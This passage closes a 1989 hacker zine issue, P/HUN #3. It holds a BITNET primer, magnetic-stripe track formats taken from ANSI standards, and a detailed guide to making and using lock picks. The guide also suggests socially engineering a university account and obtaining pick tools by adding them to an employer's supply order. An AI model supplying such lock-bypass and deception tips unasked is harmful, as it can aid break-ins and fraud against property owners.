any person with the intent comes closer to home than ever before.
The equipment is nothing of major technical wonderment, just a few simple
block circuits put together to each other so that they work together to do
the final requested product. And all of the described gear or plans may be
in the hands of everyday persons even if they don't know it! And while
most do not have such knowledge about how such systems may be used to
corrupt other systems, or even how the average telephone or toaster may
work, they will still state that such described technology is not
possible, and open the door to major disaster due to complete ignorance to
the problem. In closing, to steal a phrase from someone
else, "The truth shall set you free (or may keep you from being over
exposed from free form energy)!
"Click!" And the last words spoken by the corporate DP offical were...
" Thats impossible! You could never do that to my operation!"
Ahem, Sure sir, Sure!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #9 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
An introduction to BITNET
-------------------------
By Aristotle
Jan 17, 1989
About BITNET:
Because It's Time NET (BITNET) is the largest of the
acedemic computer networks and one of the largest mainframe
networks. BITNET connects hundreds of thousands of students
and professors in Asia, Europe, Middle East, and North
America. In 1988, BITNET had nearly 2000 computer systems at
higher institutions connected to it. BITNET may not allow
you to log onto mainframes, BUT it IS an invaluable source of
information. While on BITNET, you can access certain
services such as chat relays, file servers, electronic mail
service, and info servers. (See below for more info)
A little semi-technical info:
The mainframes on BITNET are connected via constantly
operating telephone lines or satellite links. Unlike
packet-switching networks (ie. Telenet), BITNET is a store
and forward network. That means that if you send a message
from Florida to Kentucky, the computers in the network
between Florida and Kentucky will store and forward it from
each computer to computer until it reaches Kentucky.
In BITNET there's only one path from Kentucky to
Florida. Each computer is called a NODE. Below is an
illustration of how a small section of the network would look
like.
A----B----C
| | |
D----E----F----G
| | |
H I----J ---K
Example A.
A message traveling from A to H would travel the following
path:
A-D-H
Example B.
A message traveling from A to F could travel one of two ways.
These are:
A-B-C-F or A-D-E-F
Sometimes when a node is down, the message may be
delayed or routed through different nodes as in example B.
The time to transfer messages can vary from just a few
seconds to an hour. This cause for this is usually one (or
both) of two reasons. The first factor is the size of the
message. Larger amounts of data take longer times to
transmit. The second factor is the status of the network.
As we all know, computers are prone to breaking down.
Messages that cannot be routed past the downed node are
stored in the net until there is a clear path to it's
destination.
Addresses:
Each of the mainframes(NODE) on BITNET has it's own
individual address. The addresses are usually an
abbreviation of the name of the institution that supports the
mainframe. One example is the University of Massachusettes
"UMASS".
The indiviuals that have access to BITNET also have
their own addresses. These addresses are assigned to the
user when he/she first sends information over BITNET. The
entire address for a user is set up as follows:
University of Kentucky Prime--+
|
@ (AT)----------------------+ |
| |
User ID-------------------+ | |
| | |
| | |
| | |
| | |
| | |
$108@UKPR
Note: Not all addresses give indication of the type of
system.
Also: On some machines, the BITNET ID will be different
from the system ID. Ex. CS.DEPT.SMITH.J@UKPR is also
$108@UKPR.
Access:
It is IMPOSSIBLE to access BITNET unless you can gain
access to one of the nodes. That means, there are NO
dial-ups that do not go through a mainframe. BITNET is
supported by the institutions that have access to it and it
is your right as a student to have access. It is NOT your
right to access the mainframe though. A good way to gain
access to BITNET is to go to your local university and ask or
engineer an account for the use of BITNET.
Uses:
There are three basic methods of communicating via
BITNET: mail, message, and file. Each method has it's own
advantages and disadvantages.
The interactive message (Let's just call it a message)
is the fastest and most convenient method of transitting
short amounts of information over BITNET. Messages are
composed of one line of information that is sent VERY quickly
to it's destination. You would use the message when chatting
with someone at a different node. The bad part about
messages is that if a node is down, your message is lost.
You WILL recieve an error message though.
Messages are usually sent via the TELL and SEND
commands. Below are examples of the syntax for sending a
message on the VM/CMS and Prime systems:
TELL userid@node message
or
TELL 151133@DOLUNI1 Hey Terra, How are the guys at CCC
doing?
Mail:
Electronic mail is the most versatile method of
communication on BITNET. Unlike the message, a letter will
be stored if a node is down. A letter can be from one word
of text to however long you want it. It has been suggested
to me to NOT transmit any mail over 3000 lines long (hmmm,
maybe we should explore that one.) The actual file that is
transmitted is really nothing more than a formatted text file
with a header. When you send mail from you system, You will
be prompted to input a subject so the header can include the
sending address, recieving address, date, and subject. A
piece of mail would look like this:
Date: Fri, 13 Jan 89 18:26:12 EDT
From: Terra <151133@DOLUNI1>
Subject: Greetings
To: $108@UKPR
+
=============================================================
+ Hello Aristotle
|
| Regarding the information that I have been recieving
| directed to a member of the
| Chaos Computer Club.......
rest of text
Files:
The file is the best way to send large amounts of
information over BITNET. As with mail, files are stored
until you read them or in the case of node being down, until
they are back up. Any type of file can be sent via a file.
They can be either text or binary. On a VM/CMS system, one
would use the SHIP command to send a file over BITNET. Below
is an example:
SHIP filename filetype userid@node
or
SHIP phun3 txt $108@UKPR
I suggest that you check your online help for information on
sending info over BITNET.
Now for the phun part....
FILE SERVERS, CHAT RELAYS, AND SERVICES:
Servers are machines set up as automated databases for
the distribution of various information. Servers respond to
commands via mail or message. Not all use accept this type
of communication. It all depends on the type of software the
server is running. One would send a message to a server in
the following syntax:
TELL userid@node command
or
Tell listserve@bitnic help
File servers are like servers but they are set up as
databases that transmit files. They are kinda like BBS's.
The best way to get started with a file server is to send it
the help command.
A good place to start is the Listserv@Bitnic system. It
will send you all the information you will need to get
started.
Name servers have two functions. The first is to locate a
person's address on BITNET and the second is to help you find
people on BITNET with similar interests. (Hmmm, a hacker
directory?)
I suggest starting with the name server at Drew University.
To find a particular person, just send the following to
Drew:
TELL NAMESERV@DREW SEARCH/NAME john doe
If the person you are looking for is not registered, you will
recieve a message informing you of that.
To register yourself, send the following to Drew:
TELL NAMESERV@DREW REGISTER first last interests
or
TELL NAMESERV@DREW REGISTER John Doe LMOS hacking
A chat relay is set up to allow many users to chat with
each other without having everyone sending messages to each
other individually. When on a relay, the people on your
channel (be it public or private) will all see the messages
that you send to them. This is GREAT for phreaker
conferences (Though it is NOT secure due to system operators)
and just chatting with your friends over LONG distances.
Geee and it is all legal too! To find out more about relays,
just send the following:
TELL RELAY@UTCVM help
If your local relay is not UTCVM, you will receive a message
tell you that and also your correct relay.
Well, that's it for this file. If you have any questions
about BITNET, you can contact me at the following boards:
Hacker's Den 718-358-9209
The Outlet Private 313-261-6141 Newuser/Kenwood
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #10 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PLASTIC CARD ENCODING PRACTICES AND STANDARDS
---------------------------------------------
By Hasan Ali
For P/HUN Issue #3
GENERAL PHYSICAL CHARACTERISTICS
--------------------------------
If you take any plastic card (MasterCard, VISA, AMEX, ATM cards, etc.) and
turn it over you will find a thin black strip of magnetic material. This
strip has the ability to hold multiple "tracks" or bands of encoded data.
There are 3 valid tracks. Track 1 is the track nearest to the top of the
card, and it is followed by Tracks 2 and 3. The original specifications
allowed for Tracks 1 and 2 only, and they are both read-only. The
additional Track 3 furnishes an ability to read OR write.
TRACK 1
The International Airlines Transport Association originated the development
of Track 1 as the official track airline use and, in fact, it defined the
data and encoding formats for the ANSI standard. This track was originally
designed to allow the use of customer-operated ticket dispensing machines
to cut down the traffic at airport ticket counters.
Now, many other parties make use of Track 1 because it is the only encoded
track that permits encoding of the card holder's name. With this alphanumeric
capacity, the card holder's name can be printed on an EFT terminal receipt
rather cheaply, otherwise the name would have to be sent the computer, which
would be more costly and would take more time.
There are 26 formats for Track 1, and they are designated by codes from "A" to
"Z". Format "B" is shown below.
Field Name Length(chars)
Start sentinel 1
Format code = "B" 1 (alpha only)
Primary account number Up to 19
Separator (SEP) 1
Country code 3
Name 2 to 26
Surname
Surname SEP = "/"
First name or initial
Space (when required)
Middle name or initial
Period (when followed by title)
Title (when used)
SEP 1
Expiration date or SEP 4 or 1
Discretionary data balance up to maximum
track length
End sentinel 1
Longitudinal Redundancy Check (LRC) 1
MAXIMUM TRACK LENGTH 79
Format code "A" is reserved for proprietary use by the card issuer. Format
codes "C" through "M" are reserved by ANSI for use in other data formats of
Track 1. Format codes "N" through "Z" are available for use by individual
card issuers.
TRACK 2
The American Bankers Association led to the development of Track 2 on behalf
of two credit card companies (Interbank and VISA) and their members. The
intent was to have a standardized plastic card which could be used at point-
of-sale (POS) terminals to obtain authorization for credit card transactions.
Today, in the financial industry, Track 2 is the most widely used encoding
method for plastic cards. It has a strong following because most EFT
terminals are connected directly to a computer that accesses the cardholder's
data files. Also, it is the preferred choice of the ABA and is the only track
recognized and supported by MasterCard and VISA.
The format of Track 2 is shown below.
Field Name Length (chars)
Start sentinel 1
Primary account number up to 19
SEP 1
Country code 3
Expiration date or SEP 4 or 1
Discretionary data balance up to maximum
track length
End sentinel 1
LRC 1
MAXIMUM TRACK LENGTH 40
Although Track 2 is widely accepted, there is a serious potential concern
about it because of its limited encoding capacity - only 40 characters. The
argument supporting the current capacity stresses that all the necessary
information to authorize a transaction is at the data center thereby
eliminating the need to encode extraneous data. On the other hand, those
suggesting that the capacity be increased feel that greater capacity would
allow certain transactions to be approved directly at the terminal, or,
at least, minimize data sent between terminal and computer for each
transaction. Those who hold this view are using Tracks 1 and 3.
TRACK 3
Track 3 was developed for use in off-line EFT terminals but was designed
to be compatible with other plastic card standards. Thus, Track 3 is
compatible with the ANSI standard for embossing plastic cards and the ANSI
standard for physical characteristics of magnetic stripes. More recently,
financial institutions have started to use it in on-line systems because
of its greater data storage capacity.
The format of Track 3 follows.
Field Name Usage Status Length (chars)
Start sentinel M S 1
Format Code M S 2
Primary account number (PAN) M S 19
SEP M S 1
Country code or SEP M S 3 or 1
Currency M S 3
Currency exponent M S 1
Amount authorized per M S 4
cycle period
Amount remaining this cycle M D 4
Cycle begin M D 4
Cycle length M S 2
Retry count M D 1
PIN control parameters or SEP M S 6 or 1
Interchange control M S 1
Type of account and M S 2
service restriction (PAN)
Type of account and M S 2
service restriction (SAN-1)
Type of account and M S 2
service restriction (SAN-2)
Expiration date or SEP M S 4 or 1
Card sequence number M S 1
Card security number or SEP M S 9 or 1
First subsidiary account O S variable
number (SAN-1)
SEP M S 1
Second subsidiary account O S variable
number (SAN-2)
SEP M S 1
Relay marker M S 1
Crypto check digits or SEP M D 6 or 1
Discretionary data O D variable
End sentinel M S 1
LRC M D 1
MAXIMUM TRACK LENGTH 107
"M" - Mandatory field "O" - Optional field
"D" - Dynamic field - may be modified by appropriate interchange partners
"S" - Static field - may only be modified by card issuer
For further information on these topics, find these ANSI publications
at your local good technical library:
ANSI X4.13-1979
ANSI X4.16-1973
ANSI X4.16-(Draft October 1980)
ANSI X9.1-1980
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile 11 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-----------------------------
-LOCKPICKING:AN INDEPT GUIDE-
-----------------------------
By: The LockSmith
--------------------
PART 1-GENERAL INFO:
--------------------
There are many circumstances in which entry is required when the key(s)are
unavalable. While forms of force can often be used, many times the use of force
is undesirable.The answer in many cases, is a procedure/art/skill called
Lockpicking.
-------------
PART 2-TOOLS:
-------------
There are a number of types of lock picking tools.
Some of the more common types are:
-----------
HAND PICKS:
-----------
Tools used to directly manipulate the pins(tumblers) of a lock cylinder.
----------
PICK GUNS:
----------
A semi-automatic tool used to manipulate the pins(tumblers) of a lock cylinder.
NOTE:The theory of pick guns, while fairly simple appears to be beyond the
scope of this file.
However:if I get enough requests for the theory, an addendum will be written.
-------------------
TUBULAR LOCK PICKS:
-------------------
A manual tool used to manipulate the pins(tumblers)of a tubular lock cylinder
("skate key" appearance), an example of this type of lock is the Kriptonite(Tm)
bike locks.
------------------
PASS KEYS(WARDED):
------------------
These are pre-cut pieces of flat metal used to open warded locks(usually these
are padlocks, and usually are poor quality).
These locks can generally be identified by a key that has toy-like square cuts
on *BOTH* sides of the key, and the lock has a VERY large keyway(keyhole)
As these are just inserted like a key and rotated to open the lock, no further
instructions are required.
NOTE:these locks can often be open in a pinch using a piece of wire with a 90
dregree bend(a "L" shape).
----------------------
PART 3-TYPES OF LOCKS:
----------------------
Some of the more common types:
------------------------------
PIN TUMBLER:The most common type for both padlocks and residental lock
cylinders.A variation on this is a pin tumbler cylinder that uses a side bar
design(E.G. An example is Medeco)
No matter who makes it, a true high security cylinder will generally prove to
be virtually unpickable.
WAFER TUMBLER:Used on some padlocks, but mostly used on specialty locks,
EG..desk drawers, showcase locks(the locks used on glass sliding doors in a
cabinet, usually used to deter theft), telephone locks, liquor
cabinet, etc. Also, a variation is used on most auto locks, but most are not
redily pickable, as they have a sidebar design.
NOTE:you can tell a wafer lock from a pin tumbler lock by looking into the
keyway. If you see round pins, then it is a pin tumbler, but if you see flat
strips, then it is a wafer tumbler lock.
LEVER:These locks are likely to be seen in only 3 applications 1.The old mail
box locks(the ones that use a flat key), bank safe deposit box locks, and coin
telephone locks.A variant were the locks used on old doors(these are properly
called warded bit locks, but most people seem to call them "skeleton key"
locks)..these are the kind that you could look through the keyhole and see
what was happening on the other side.This type was also used for some old
furniture locks(cabinets and drawers mostly).
WARDED:These locks, generally poor quality ones are generally used for padlocks
, they are also used outdoors if extreme conditions prevail(EG:sand and salt
water)this is because these locks have few moving parts, and have large spaces
in their design.A variation on this is often used for luggage locks.
NOTE:the key may LOOK like either a Pin tumbler or a lever lock key, but in
most cases these locks are warded and can be open in a simular fashion.
A hint:this is one of the rare situations where a bobby pin may actually be
usefull.
TUBULAR LOCKS:
These are used in several applications: 1.car alarm locks
2.home alarm locks
3.kriptionite(Tm) bike locks
4.older CHAPMAN(Tm) car locks
5.Vending machines
These are used elsewhere as well.
PART 4 MAKING TOOLS:
--------------------
EXAMPLES:A easy place to get pictures of handpicks is the HPC catalog..
(HPC, Inc/Schiller Park,IL/60176(Phone #(312)671-6280).
This is one of the largest locksmithing supply manufacturers
You can call, or write, or if you can find a local locksmith supply house, they
may have copies available.
Note that the drawings, allthough detailed, are smaller than the actual tools,
but the size tends to be obvious.
NOTE:The correct size of a HPC pick handle is about 3 and 1/8 inches long.
If you have the the HPC drawings enlarged at a copy shop to just under 3x then
they will be of a useable size(If they can't do odd size enlargements, 3x
should be close enough.
B:MATERAL:Many materials are suitable for making picking tools/tension tools
1.Gutter broom bristles(those *BIG* trucks with the rotary brushes that wash
and sweep the street at the same time). Look for the bristles after the truck
leaves...generally at least a few break off...it is preferable to look near a
irregular spot of the road, as this tends to induce bristle breakage.
Also, depending on your area, you may find that smaller trucks are used along
with the larger ones...these generally use thinner bristles, which make better
picks, but many times, the thicker type makes better tension wrenches
NOTE:A Package of strips/round strips of spring steel can be obtained from a
locksmith supply house, but you will pay at least $18.00 for this!
NOTE:If you *really* to buy the tools..there 3 ways to go...
1.Try to order them through the mail..allthough the feds have been trying to
pass a bill prohibiting mailing picks, and door opening tools, unless you can
prove you are a bona-fide locksmith(not as hard as you might think)..THIS BILL
HAS NOT PASSED AS OF YET. Also..the last time I checked am issue of HIGH TIMES
, there was a small advertisment in the back, and they had a pick set(for about
twice the price as the item's standard retail price.
2.Try to work for a store/shop that has a locksmiths license(*NOT* a keymakers
license).
Sooner or later they will ask you to pick up supplies..if the supplier has what
you need, then you can add the items to the order.
3.try and make friends with a locksmith..he can get you tools.
---------------
TOOLS REQUIRED:
---------------
If you are trying to make your own picks these tools are a good start...
1.A set of warding files(these are often available in the tool department of
large discount stores...For example, for people in NYC, a chain of stores
called Webers tends to have these at a good price.
While you can buy a set from a locksmith supply house, you will pay at least
$20.00-$30.00 for a small set.
The discount store ones are generally $3.00-$5.00 a set.
While the quality is a bit lower, at least from my experience they do the job
ok.
2.A small propane or butane torch(if butane, one that can be refilled with a
can of cigarette lighter butane will be a lot cheaper to operate.
Note:a gas(but NOT a electric)kitchen stove burner will often do in a pinch.
------------------
HOW TO MAKE TOOLS:
------------------
First, let's assume that you are starting with gutter broom bristles, as they
are generally easy to get, and cost nothing..
First, let's start with a tension wrench...
Take a piece about 4-5 inches long, and make a sharp bend 1/4-1/2 inch from
the end(but DON'T make the bend so sharp that the strip cracks(if you want to
make a sharp bend, heat the strip at the point that you want to bend to red
heat and let it AIR COOL do not cool in fluid, as this will make the metal
harder! After, if you want to reharden it, reheat, and plunge it into either
oil or water(oil is better). If this results in the metal getting too hard,
then try cooling it a little slower. A book on metal working may be useful.
Also, if you want to make a complicated bend(a half twist, for example)then
heating the strip at the bend point will allow easy bending(this is one of
those times where a kitchen gas stove probably will not quite make it.
PICKS...You need pictures or drawings
(preferably full size).
Once you have these, select a piece of metal, soften about 2-3 inches using
a torch or gas burner, then get out your warding files and get to it!
NOTE:While in theory, you probably could file the strips without softening
them first, the metal is hardened, and resists being filed(this is also rough
on the files). What may help, whether you soften or not, is that a metal
nibbling tool can used for the rough shaping, and in some cases, can be used
to do most of the work. However you do it, it may be advisable to file the 2
flat sides of the tool(just a bit).
PART 5 USE OF TOOLS:
--------------------
The use of lockpicking tools is as much an art as it is a skill, but most
persons with enough practice can learn to do a decient job.
A good book on the subject comes from HPC(again)(Basic Picking and Raking.
This runs around $15.00), this is a bit overpriced, but a good guide.
But, let's go on......
Hand picks:
-----------
There are 4 different types of picks
The rake
The hook(this has other names as well)
The diamond
The ball/double ball(2 balls stacked)
The rake:
---------
The rake is prehaps the easiest tool to use, but it does not teach you much
about the lock you are working on;if this does not matter to you, then don't
worry about it. Hold the cylinder or padlock in a upright position(the way
it normally be mounted). The pins should be on the top.
Hold the pick with the more prominent wiggly side up(the hollow side down).
Tilt the back of the handle downward a bit;the wiggly part should be
horizontal. Now put it down for a minute, and pick up a tension wrench(L shaped
piece), and insert the shorter bent end into the bottom of the keyway.
Now..
Rotate the wrench in the direction that the lock normally rotates to open-if
not sure-pick a direction.
Then..hold the pick so that the handle is angled towards you slightly;at this
angle the curved part should be horizontal. Insert the pick into the lock all
of the way into the keyway, and making sure that contact is attained with the
pins. Draw it out..repeat until lock is open. But..don't push the pins up by
forcing the pick upward with great force...not only will this not open the
lock, but you will bend the pick as well.
If it does not open:
First, release the tension(you should hear the pins drop).
1.Try less(or more)tension on the tension wrench(NOTE:most problems are caused
by too much tension).
2.Try holding the pick at a slightly different angle and/or height.
3.Try picking the lock in the other direction.
The hook:
---------
The hook is used to lift individual pins in a cylinder.
The tension wrench is inserted and rotated the same way as above.
After putting tension on the wrench, insert the hook into the keyway with the
hook upward. Then, starting from the rearmost pins, lift each pin.
To do this:Lift the pin until you feel a bump, or a "click", or a change in
the spring action of the pin then STOP and go to the next pin.
Continue this until the lock opens.
If it does not open release the tension then:
1.Try with more or less tension(NOTE:usually the problem is too much tension,
so try lowering it first).
2.Try starting from the front pins, instead of the back ones.
3.Try picking the lock in the other direction.
The diamond:
------------
This tool is used the same way as the rake, as it is a modified rake design,
although it does not look the same.
The ball/double ball:
---------------------
These tools are mainly used for picking wafer tumbler locks.
They are used the same way as the rake, except these locks open *so* easily,
that you probably won't have to worry about the lock not opening.
NOTE:these locks can often be open in a pinch by using a bent paper clip(rake
the wafers and rotate the clip at the same time)
PICK GUNS:
----------
The most difficult part about using a pick gun is not using it, but getting the
damm thing in the first place. They are available from most of the same places
that hand picks are sold, but unlike hand picks, are not readily made at home.
If you manage to get one(the best one, at least in my opinion, is the LOCKAID.
This pick is made by a company called majestic.
It is made very well, has an ajustable strike force dial, and has a LIFETIME
warranty!
Well, let's assume you have one of these tools...
Well the first thing is to get a lock(a small padlock is a good practice item)
then...
1.insert the tension wrench at the bottom of the keyway, and rotate it in the
direction that the lock opens.
2.starting with the pick gun's tension dial set either to 0 or 1(0=the point
that the dial will go no lower)(1=1 full turn in the opposite direction), take
the pick gun and insert it's needle into the keyway, but try not to insert it
beyond the pins, as the needle may bind. Holding the tool horizontal, squeeze
the trigger. Do this 6-8 times, if no results then release the tension(on the
cylinder), raise the pick gun's tension dial 1 full turn, and try to open the
lock again. Keep trying until you get it open.
TUBULAR LOCK PICKS:
-------------------
The best guide to using a tubular lock pick, is the instructions that come with
it. However, as these may not be available, these general notes will get you
started. Also HPC has a tutorial on using tubular lock picks(Basic Picking and
Servicing Tubular Locks) (a bit costly, but if it is as good as other HPC
tutorials I've seen, it may be worth it).
GENERAL INSTRUCTIONS:
---------------------
1. Take the pick and slide the feelers(the moveable tines) back and forth a few
times. Slide all of them (usually 7) out past the end of the tool a bit(maybe
1/8th of a inch or so). Then press the tool aginst a hard surface until all of
the feelers are flush with the end of the tool.
2.Insert the tool into the front of the lock and gently push it all of the way
into the lock.
Then rotate the tool in the direction required for opening, but use a minimum
of force, as excessive force will cause 2 difficulties:
1.The front of the pick may be damaged.
2.The lock may not be able to be open at all, or if it can it may be damaged.
After rotating the pick, slowly pump it in and out of the lock but note that
the pick should only be backed out about 1/8 inch or so.
Keep doing this;eventually the lock should open.
If not...start again from the start.
=-=-=-[ End of P/HUN Issue #3 :: Hacker's Den BBS (718)358/9209 ]-=-=-=-=-=-=-=